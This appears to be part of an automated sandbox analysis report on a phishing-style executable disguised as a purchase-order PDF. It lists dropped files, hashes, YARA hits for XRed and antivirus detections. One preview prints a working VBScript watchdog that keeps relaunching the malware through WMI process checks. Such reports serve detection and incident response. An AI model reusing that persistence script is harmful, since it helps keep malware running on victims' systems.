                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.0.8.<./.P.i.
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4590
                                                                                                                      Entropy (8bit):4.463117864307901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zsTJg77aI9MfWpW8VYH8PYm8M4JFJF3I+q8nRc5Z3d:uIjftI7uO7VU8SJdIwmZ3d
                                                                                                                      MD5:AD29374BA4F86AF783CDECA5EF3AF16D
                                                                                                                      SHA1:9356B56C3D4FCF6A2C09863B86A75C3A433303A1
                                                                                                                      SHA-256:A5C9C78CF6B81E10DB1FD0E2AFEFBB325712BC4734ABF101C6CC68AB6AE399C2
                                                                                                                      SHA-512:FF2DF05A90DFCC24EFBD98AB1F40EF648BB0E1BB9C710AA9C989BB42A1D4C14A514116D92AFCA278C3C418D6646441E90AB1F7EAA6FFAC245CE41ED5164A6CE7
                                                                                                                      Malicious:false
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653863" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:41:10 2024, 0x1205a4 type
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2717294
                                                                                                                      Entropy (8bit):2.2991752341014706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:gnWb18d5okAENrzuZbZv1E6yRJOH4k4R6DM4RrN:gnWh8DlyHOk4R6zR
                                                                                                                      MD5:BFB9B5AF2C2F5745A2BBA6DF553D824C
                                                                                                                      SHA1:A349F189F300E6F52692821A18AB4957EBBA98AB
                                                                                                                      SHA-256:8F21430D9732FFE2A067A68F736E93409F984BB31AE97FDAB3FDEC4BB33D7C49
                                                                                                                      SHA-512:FAC7DE1288DD839A5E57C93AB5A51A2CB35E66C36DCE9ED74C5950873E1C407E988A0EA122C224DF0F0077DDD7F7EA44899991CF84FFEB7EF9066409402A0D96
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):771584
                                                                                                                      Entropy (8bit):6.638013190381294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                      MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                      SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                      SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                      SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX6FCE.tmp, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Joe Sandbox View:
                                                                                                                       • Filename: Purchase-Order.exe, Detection: malicious
                                                                                                                       • Filename: hoaiuy.msi, Detection: malicious
                                                                                                                       • Filename: 222.msi, Detection: malicious
                                                                                                                       • Filename: Machine-PO.exe, Detection: malicious
                                                                                                                       • Filename: 222.exe, Detection: malicious
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2203648
                                                                                                                      Entropy (8bit):7.056405744702409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                      MD5:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                      SHA1:3C0221471B641A641A9141A731F6EE09663E6538
                                                                                                                      SHA-256:F3724BF49BFD8D11EF1F81B4C6AEBC4D3281CECFA357D4FB3AE388A4ADD242E6
                                                                                                                      SHA-512:F0AB6ED5DFA52D8159C5090FD96087BA8E89C26C2FDB90FAE3F4D19B6952250ECD49846B9198D7C77AFFB6FABE3A0E53758392409A73552B202591433AFC03E6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.262057842376339
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0Z7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O+pAZewRDK4mW
                                                                                                                      MD5:A3CBB6BFA8826BCB73DDF8F8BF67BDF6
                                                                                                                      SHA1:0D01E28DFFF556551C6AC7F63B1226A62A22F868
                                                                                                                      SHA-256:F2D2123B0AA8A1B26CC031B6D6438C9DB37DC7D0CB2CEB29412C7CBB45BC91BE
                                                                                                                      SHA-512:FA458FFA551E54B8043FD4CC71D00A191353AFC083D6C9C6B94B608851AA19ECFDD23506D58B862F5136C19CCCD163276A83837DC0E4AA6232F66211EA2F6AA3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N5DpkcM40-KmD2OG604_uQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.249483813062525
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0nfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                      MD5:6F00C01AEF644E4DC9CF7A4DE8D64666
                                                                                                                      SHA1:C60118AD60C3078F21C8A4D0751A6B520311E7D0
                                                                                                                      SHA-256:A0B5613EACE9E7A0347769691D4BCC3C3B1AAFD4463AEC3817AB68EC1DDB187A
                                                                                                                      SHA-512:000E69E9092A8C40E92C5A2FED30EAB4F56220378E801E6F08D827DE6CEB5081B2F77250AE00504D2B14C8552178E786D5231F48FA8986FB2A2B11225FCC21F8
                                                                                                                      Malicious:false
                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oGbJXCH8x5p-s1tcTMp1ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.267407542534121
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                      MD5:EC6F455B08F19D978733D212AA118BBF
                                                                                                                      SHA1:60445A3BA9FEB15C8C61FAEF147E95B763CB4106
                                                                                                                      SHA-256:39AFFD236501C4AA3304B8F1EFE476548404F09AF7181D94FB18CEF9F56202DD
                                                                                                                      SHA-512:13F9688A753F5CE8763ED0049C14AB48042B1DC2FFC890476ECA8EC9E750CD4CC7C536FE6AE42A8B2C70080697792A44B3BDBAD916DD59164E2A631B791F7F6B
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2518032455403985
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+06Q1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JQ1+pAZewRDK4mW
                                                                                                                      MD5:1C11BDA248185C5C711228B2CFCBA1F6
                                                                                                                      SHA1:468D7A0EF60BDF48FC6398BFA6974B7578DDB5F6
                                                                                                                      SHA-256:95721DEB1C768CEB39E56E7E51982ECF2262E8876E3C4936BA30C9BF8D8BB717
                                                                                                                      SHA-512:4D61AE82C2F07D72643B426C9F3E5DDD1666FD111C76DB4A5400813DE00F4482F9A678E111E684929151AB68F04DC31C81F58679D04E3870A0AB564373B6EFE4
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):892
                                                                                                                      Entropy (8bit):5.412546740664526
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:dF/UFy/uPU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFgt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                      MD5:C7A5EF361A994FF9FB96426ABA42D6FB
                                                                                                                      SHA1:8D11144A059F38AC646F2CA1A1AB2D3148261A12
                                                                                                                      SHA-256:0F9C917A9C1A2DDE96F396EDF6632D7465017231E2244EB373D8BAAC8D81B14E
                                                                                                                      SHA-512:BDFC31623D7B8B4CF62039600929B1D67BD35529CB14885A21A29B159C6E5E871E741E53E1A0837CC4073CABBA2053F888E494F32598054BF0D0AEB87D1408EA
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_New PO - Supplier 16-12-2024-Pdf.exe"..fileset = """C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.271764137257545
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0anDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+JD+pAZewRDK4mW
                                                                                                                      MD5:50BEE30D3CC6B6C11DF74E8D848AD43C
                                                                                                                      SHA1:49C3D8AF0A8E49A5B3E62C60C3812F1F5DF1E41F
                                                                                                                      SHA-256:3072E3E28E40FA526471C9E8BC1AB3E80D4AAD571018CE21358F89A846CCC587
                                                                                                                      SHA-512:3BA3A09ABD9A4B30BE808AC34AC7DFB781581D9502A8A2D715962C56D4AB79DE7C35D46A48DA026D1AD2BD45D90F94ABD908F2E58094BC24429D4ED488A00FB4
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2773868830826185
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0lqXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Eo+pAZewRDK4mW
                                                                                                                      MD5:6CF508D00B8112C8661D11EC725BBB28
                                                                                                                      SHA1:A59848A5190A7C08D3289BDB318F16836DDB762E
                                                                                                                      SHA-256:1411A6E9EF5A550E8979E2C46611B2754B357BC250248B77575395280A09FEF2
                                                                                                                      SHA-512:9888FDA7794B1A06EF889DD303E43461E2ED369CC88AB5ADA7B8E99DE96DB0D2236241020574588684BA61B9358D16562A5C3E5D81A3DE981F48BB5E2FA54B48
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.264746037260788
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
                                                                                                                      MD5:E20BB8A0A50D0AEE789A5FE55F2C7A3A
                                                                                                                      SHA1:AD310D82EBE9347D87F4410DB2CD8C2F2F4452F3
                                                                                                                      SHA-256:2F7B81BBD7B5DA43F5F914AD07F3978925EA38CBBB9D71EA0D479B03BB4F6FCB
                                                                                                                      SHA-512:A0C47E599F0FAC8FC0769B82804BB032A74F2E1602963F4390E4EE9B10A49CC38FCC8894A2E47400DAE0413B0A3329F4CBE65AC474AC5DC8B4552F68CEB2174D
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.260119238066125
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+08f3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Zf3+pAZewRDK4mW
                                                                                                                      MD5:83E0141767DAF1A7325CC946061976C2
                                                                                                                      SHA1:5E5F48E051265101626872264F3496B1D36F5DA6
                                                                                                                      SHA-256:7FBB126D63BD8687992A67D8131B1CD91FAE585591A5FA7692E573C002DB0126
                                                                                                                      SHA-512:F782EF5DBDC9DC828826371C650516BF6FE45D414E47F497200C83FACA1A99AFB9405419185B6EA6355A701A5C5509EE5871C0002239E81317BF39B15E7F252F
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.261838307735042
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+07pXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                                      MD5:1992BA04DEED2EDECAAB987F36B6C3DD
                                                                                                                      SHA1:4D823D8777550AAC99620A07D2A2F51AB4F6AB03
                                                                                                                      SHA-256:A2BF38A7370E2DCEA7E8EBD6D25CD3A7403FBCA44A81BBA4052600CC511157AE
                                                                                                                      SHA-512:507E7A0269EC99300B4BF9B2191762461A1D6F78BA0E45DB9D4377E77DAEB37EFC06FB63D70423034DFBDD07E64370E62B589A951201F47EE443010F3AAD00E2
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18387
                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.254198315789012
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0dXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kX+pAZewRDK4mW
                                                                                                                      MD5:CC1DF8F8CAAD4277D180AD1AAAC25EB9
                                                                                                                      SHA1:5F62139BE47F4F446199F1B3980014918E5F3F30
                                                                                                                      SHA-256:C8690967E7A712B1CA8B58F47D7E1728FE8C0160C4E30A60E6D364813CDC33EC
                                                                                                                      SHA-512:10679CCE57C4E987BFB39A98635D8FFB507DA942C089B90AA89BE71FCDDD9BB3FF762E7807459671B186A641B4F257DB90E2787EB8504E7807B15DC3691DAEEB
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2634141685051725
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                                      MD5:C67B7450253F3490FADC3E91390BFF54
                                                                                                                      SHA1:17D12507A926CCE02FB63F231B7F27B8E52E0983
                                                                                                                      SHA-256:2FCC5E888A7813D464386D3B0B9B8F5588E99162A69FD995C49A7B763382CE83
                                                                                                                      SHA-512:68A2DC11A39BD93882FC73AC295FCF75C5825CC0A0BA80875434095F18AA6AE7CDA66504ABB495CA5087EE05024713BEBD371220CAF2B01313879B3BCCF96973
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.263702672962292
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0A0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Rg+pAZewRDK4mW
                                                                                                                      MD5:1912E730CE5458468ED5DA33830ADE03
                                                                                                                      SHA1:C1445D974BC8D7E037F2F2CD76785C7340F2FDB2
                                                                                                                      SHA-256:349C3C07870EC0B72AEC8ED6A6BD829C67A54CA350174BF16D4FC83BE8416DCA
                                                                                                                      SHA-512:1F613652FEA08A1A2FE255EC56BEE97EF5FF94225BFC7F863204628F54F2912AA6178A3F53BB073A218385DB681B5B00CB3EEBDC12F1776C4E2874BB46D33C4B
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.264412294733581
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0XRbbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                                      MD5:ED5350984ECCC74494A428A9D7591FDA
                                                                                                                      SHA1:C0395BC434CD58821F906CB65EC1B202BBCB536C
                                                                                                                      SHA-256:0F148197A633886B0C328ACC1BB30FBBC92EAF6FBB98EDA5079F6EDADCEF0B32
                                                                                                                      SHA-512:AE5130BBF2135299A3CBD1D8B9CF9227104A3CE960B9D1484F5F239D8E599C6188895EE52C0A93574C4A9D3C464296E4AA3A30AEBDD5AB172EA329457997563E
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.276326816022294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+0loXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+QK+pAZewRDK4mW
                                                                                                                      MD5:5D062426A540D8F94E401E5157832C5B
                                                                                                                      SHA1:83B3DEFACA20FDA91D8DAE3D9633837563EA2120
                                                                                                                      SHA-256:FFF1AF80B4F9A3BA4493C6DA36C2BAB355EF2C06CACE9ED2B64D75A8B003F675
                                                                                                                      SHA-512:2EE12AD3E7EE2CA5EDB48A2EFE9515E2534430888F8140A0861D0077902C54F77306D61671C737264B37DB060D1A18A5613D73FE7034B4F45FA6016B5E402218
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
                                                                                                                      Entropy (8bit):5.2578830152190035
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                      MD5:859EB5760D4E8B70A896139E6314788B
                                                                                                                      SHA1:62A01765522256F1D862729B8DCD93DB0D2EBE5D
                                                                                                                      SHA-256:60B8A0D66B4EC9537EE3754CAD9F0C012B71B082F58BAEF970805E41DEC15ED6
                                                                                                                      SHA-512:2E0DABCEDD186C7986230B80A8551484AD1776691B6719C028D0E36AA285D6DC4D827066186011A34A852C71CDF84CEC7AE47D1DBD8C0530C4E2CD8C8A0EF03F
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1652
